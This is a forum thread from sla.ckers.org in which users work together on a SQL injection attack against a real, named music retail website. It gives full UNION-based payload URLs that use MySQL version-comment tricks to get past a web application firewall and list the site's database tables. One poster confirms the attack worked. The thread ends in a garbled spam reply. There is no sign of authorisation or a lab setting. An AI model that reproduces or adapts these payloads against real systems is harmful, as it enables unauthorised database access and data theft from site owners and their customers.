Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
How do you completely compromise a machine given a text box or badly validated input box? This is a place to talk about code issues (PHP includes, null byte injection, backticks, pipe, etc...) as well as how to properly construct an SQL injection attack. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
SELECT command denied to user 'univesb3_music'@'localhost' for table 'TaBleS''
Posted by: kenjii
Date: November 29, 2013 01:38PM

hi it's me again :)


http://www.universalpartymusic.com/productDetails.php?id=-288+/*!50000UnIoN*/ /*!50000SeLeCt*/ 1,database(),3,4,5,/*!50000GrOuP_CoNtAcT*/(table_name),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+/*!50000InFoRmAtIoN_ShEmA*/./*!50000TaBleS*/--


on this link i can count column, see the vulnerable but i can't see the table_name

Options: ReplyQuote
Re: SELECT command denied to user 'univesb3_music'@'localhost' for table 'TaBleS''
Posted by: ajkaro
Date: November 29, 2013 03:01PM

WAF is protecting group_concat.

Use:
hXXp://wXw.univers[slackers]alpartymusic.com/productDetails.php?id=288 and 0 /*!50000UNION*/ SELECT 1,version(),3,4,5,/*!50000Group_Concat(table_name,0x3c62723e)*/,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 from /*!50000information_schema*/.tables where table_schema=database()%23

Options: ReplyQuote
Re: SELECT command denied to user 'univesb3_music'@'localhost' for table 'TaBleS''
Posted by: kenjii
Date: December 02, 2013 05:39PM

thx after read your tutorial i can do this :)

Options: ReplyQuote
Re: SELECT command denied to user 'univesb3_music'@'localhost' for table 'TaBleS''
Posted by: pridsr4
Date: December 10, 2013 03:14AM

Thank you for the great offer.

????????????????????? sbobet ??????????? ????????????????????????????? sbobet ???????

Options: ReplyQuote


Sorry, only registered users may post in this forum.